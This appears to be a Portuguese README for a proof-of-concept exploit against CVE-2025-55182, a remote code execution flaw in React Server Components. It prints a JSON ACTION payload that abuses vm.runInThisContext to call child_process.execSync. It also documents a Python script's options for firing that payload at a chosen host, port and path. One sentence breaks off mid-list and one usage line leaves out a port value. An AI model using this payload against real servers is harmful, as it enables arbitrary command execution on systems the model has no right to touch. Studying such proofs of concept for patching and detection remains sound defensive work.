
Exploit de prova de conceito para CVE-2025-55182, demonstrando execução remota de código em React Server Components através de payloads ACTION maliciosos e injeção de vm.runInThisContext.
Este projeto é a CVE-2025-55182 - React Server Components (RSC) RCE Prova de Conceito, demonstrando que sob condições específicas é possível acionar execução remota de código através de vm.runInThisContext e ACTION payload malicioso.
O ACTION payload dos React Server Components sob certas condições irá:
Atacantes podem construir o payload:
{
"$ACTION_REF_0": "",
"$ACTION_0:0": "{\"id\": \"vm#runInThisContext\", \"bound\": [\"global.process.mainModule.require('child_process').execSync('calc').toString()\"]}"
}
| Parâmetro | Obrigatório? | Padrão | Descrição |
|---|---|---|---|
--host | Sim | Nenhum | IP ou domínio do servidor alvo. Ex.: 127.0.0.1, 192.168.1.10, example.com |
--port | Não | 80 | Porta do serviço HTTP alvo, ex.: 3003 |
--path | Sim | Nenhum | Caminho da rota alvo que pode acionar a vulnerabilidade, ex.: /feedback, /action |
--https | Não | False | Se deve usar HTTPS para enviar o payload (padrão HTTP) |
python a.py --host <IP_alvo> --port --path <caminho_URL_alvo>
python a.py --host 127.0.0.1 --port 3003 --path /feedback